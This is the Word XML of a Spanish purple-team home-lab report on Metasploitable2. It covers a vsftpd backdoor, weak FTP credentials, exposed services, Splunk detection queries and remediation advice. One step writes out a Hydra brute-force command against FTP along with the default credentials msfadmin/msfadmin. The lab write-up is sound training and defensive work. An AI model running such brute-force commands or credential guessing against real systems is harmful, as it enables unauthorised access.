    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Recomendación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Actualizar vsftpd a una versión oficial y verificada. Nunca usar software de fuentes no confiables. Implementar monitoreo de conexiones al puerto 6200.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B6CA8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 HALLAZGO-002 — Credenciales débiles en FTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FDEBD0" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERIDAD: ALTA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Puerto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21/tcp — FTP</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2E4057"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Servicio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vsftpd / ProFTPD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Vector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Red — Ataque de fuerza bruta</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2E4057"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Herramienta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Hydra v9.6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4057"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Credenciales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msfadmin / msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">El servicio FTP acepta credenciales débiles y predecibles. Un ataque de fuerza bruta con diccionario básico logró identificar la contraseña en menos de 15 minutos, con más de 500 intentos de login registrados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Pasos de explotación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l msfadmin -P /usr/share/wordlists/metasploit/unix_passwords.txt ftp://192.168.0.129 -t 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Más de 510 intentos de login al puerto 21 generados y detectados en Splunk. Las credenciales msfadmin/msfadmin son trivialmente adivinables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Recomendación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementar política de contraseñas seguras. Configurar bloqueo de cuenta tras 5 intentos fallidos. Deshabilitar FTP y reemplazar con SFTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B6CA8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 HALLAZGO-003 — Múltiples servicios innecesarios expuestos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="D5F5E3" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  SEVERIDAD: BAJA  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Descripción</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">El sistema expone 22 puertos abiertos incluyendo servicios obsoletos como Telnet (puerto 23), IRC (puerto 6667), y una shell root directamente accesible en el puerto 1524. Cada servicio adicional representa una superficie de ataque potencial.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Recomendación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Aplicar principio de mínimo privilegio. Deshabilitar todos los servicios no requeridos. Implementar firewall restrictivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="2E4057" w:val="clear"/>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  5. Detección en Splunk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Todos los ataques ejecutados fueron detectados mediante el sistema de monitoreo Splunk Enterprise configurado en el entorno. Los logs de iptables de Metasploitable2 fueron reenviados en tiempo real al indexador Splunk vía UDP 514.</w:t>
      </w:r>
    </w:p>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5.1 Configuración de detección</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables configurado para loggear todas las conexiones entrantes con prefijo CONEXION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sysklogd reenviando logs al puerto UDP 514 de Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk indexando eventos con sourcetype=syslog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Dashboard Purple Team - Detecciones con 3 paneles activos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B6CA8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Queries SPL de detección</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Query 1 — Detección de escaneo de puertos (Nmap)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">index=* "CONEXION" "SRC=192.168.0.128"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado: 3,077 eventos detectados correspondientes al escaneo Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Query 2 — Detección de ataque FTP vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">index=* "CONEXION" "DPT=21" "SRC=192.168.0.128"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado: 46 eventos detectados correspondientes al exploit vsftpd.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E4057"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Query 3 — Detección de fuerza bruta FTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">index=* "CONEXION" "DPT=21" "SRC=192.168.0.128"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado: 5,431 eventos detectados correspondientes al ataque Hydra.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="2E4057" w:val="clear"/>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  6. Recomendaciones Generales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Recomendación</w:t>
            </w:r>
          </w:p>
        </w:tc>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Prioridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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Esfuerzo</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Actualizar vsftpd y eliminar versión con backdoor</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C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CRÍTICA</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Bajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Implementar política de contraseñas seguras</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bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ALTA</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Bajo</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Deshabilitar servicios innecesarios (Telnet, IRC, Bindshell)</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E67E22"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ALTA</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Bajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Configurar firewall restrictivo con whitelist de puertos</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bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ALTA</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Medio</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Implementar SFTP en lugar de FTP</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B8860B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIA</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Medio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Configurar bloqueo de cuenta tras intentos fallidos</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bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0F0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Bajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Monitorear logs con alertas automáticas en Splunk</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B8860B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="2E4057" w:val="clear"/>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  7. Conclusiones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">La evaluación de seguridad sobre Metasploitable2 demostró múltiples vulnerabilidades críticas que permitieron obtener acceso root completo al sistema objetivo. El entorno presentó una superficie de ataque excesivamente amplia con servicios obsoletos, credenciales débiles y software con backdoors conocidos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Desde la perspectiva defensiva, el ejercicio validó la efectividad del pipeline de detección implementado con Splunk. Los tres ataques ejecutados — escaneo de puertos, explotación de backdoor y fuerza bruta — fueron capturados y correlacionados exitosamente mediante queries SPL, demostrando la viabilidad de un SOC básico en un entorno de home lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Este laboratorio purple team sirvió como plataforma de aprendizaje integral que combina técnicas ofensivas (red team) con capacidades defensivas (blue team), desarrollando habilidades aplicables en roles de SOC analyst y penetration tester.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— Fin del Reporte —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Fernando Sanchez Juarez | Purple Team Home Lab | Junio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2026-06-24T04:08:37.151Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-24T04:08:37.167Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
